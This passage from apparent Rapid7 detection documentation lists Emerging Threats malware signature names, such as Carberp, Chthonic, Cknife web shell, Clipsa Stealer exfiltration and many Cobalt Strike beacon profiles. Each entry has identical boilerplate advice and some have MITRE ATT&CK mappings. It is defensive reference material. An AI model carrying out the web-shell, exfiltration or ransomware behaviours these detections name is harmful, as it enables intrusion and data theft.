Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BUILDINGCAN CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Buran Ransomware Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Buran Ransomware Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE BYOB - Python Backdoor Loader Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BYOB - Python Backdoor Stager Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE C3Pool CoinMiner Setup Script Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Campo Loader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Capfire4 Checkin (register machine)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE carberp check in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp checkin task

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp CnC request POST /set/task.html

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Carberp file download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Casbaneiro CnC Host Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cashout Proxy Bot reg_DST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cayosin Botnet User-Agent Observed M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cayosin Botnet User-Agent Observed M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBeplay Downloading Design

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBReplay Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CBReplay.P Ransomware

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE CenterPOS CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CenterPOS Delete Plugins

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CenterPOS Load Plugins

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CerberTear Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ChaChi RAT Client CnC (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaChi RAT Client CnC (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaChi RAT Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chafer Win32/TREKX Uploading to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chafer Win32/TREKX Uploading to CnC (Modified CAB)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ChaseBot CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (command)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (file)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (hello)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chinotto CnC Activity (result)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Chthonic CnC Beacon 5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Chthonic CnC Beacon 6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Citadel Activity POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Citadel Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cknife Shell Command Struct Inbound (aspx)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cknife Shell Command Struct Inbound (PHP)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Click Fraud Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ClipBanker Variant Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Clipsa Stealer - CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Clipsa Stealer - Coinminer Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Clipsa Stealer - Exfiltration Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CloudAtlas APT Maldoc Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cloud Atlas CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CNRarypt Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Cobalt Group SSL Certificate Detected

Description

Recommendation

ET MALWARE Cobalt Strike Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Beacon Activity (UNC2447)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (UNC2447)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Amazon Profile) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Bing Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Custom Wordpress Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Observed (MASB UA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (WooCommerce Profile)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike C2 Profile (news_indexedimages)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Exfiltration

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 (Adobe RTMP)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

